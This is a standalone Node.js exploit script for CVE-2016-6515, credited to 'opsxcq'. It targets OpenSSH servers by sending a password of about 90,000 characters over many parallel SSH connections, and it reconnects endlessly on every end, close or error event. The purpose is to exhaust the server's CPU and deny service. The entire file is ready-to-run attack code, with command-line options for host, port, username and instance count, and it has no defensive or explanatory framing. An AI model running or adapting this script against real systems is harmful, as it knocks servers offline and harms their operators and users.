exploit.js

#!/usr/bin/env node

/*
 * CVE-2016-6515 exploit by opsxcq
 */

var Client = require('ssh2').Client;
var program = require('commander');

function usage(){
    console.log("[-] Usage: ./exploit.js -h host -p port -u user");
}

var pattern="AAAAAAAAA";
var buffer="";
for(var i=0; i < 10000; i++){
    buffer = buffer + pattern;
}

function exploit(host, port, user){
    var conn = new Client();
    conn//
    .on('end', function() {
        // Again
        exploit(host, port, user); 
    })//
    .on('close', function(err) {
        // Again
        if(!err){
            exploit(host, port, user); 
        }
    })//
    .on('error', function(){
        exploit(host, port, user); 
    }) //
    .connect({
        host: host,
        port: port,
        username: user,
        password: buffer
    });
}

program.version('1.0.0')
.option('-p, --port <n>', 'OpenSSH Port', parseInt)
.option('-u, --user <n>', 'Remote username to try to login')
.option('-h, --host <n>', 'OpenSSH Host')
.option('-i, --instances <n>', 'How many paralel instances',parseInt)
.parse(process.argv);

if (!program.port){
    usage();
    return -1;
}

if (!program.user){
    usage();
    return -1;
}

if (!program.host){
    usage();
    return -1;
}

var instances = 20;
if(program.instances){
    instances = program.instances;
}

try{
    console.log("[+] Exploiting "+program.host+":"+program.port+" with user "+program.user);
    for(var i=0; i < instances; i++){
        exploit(program.host, program.port, program.user);
    }
}catch(e){
    console.log("[-] Exception: "+e);
}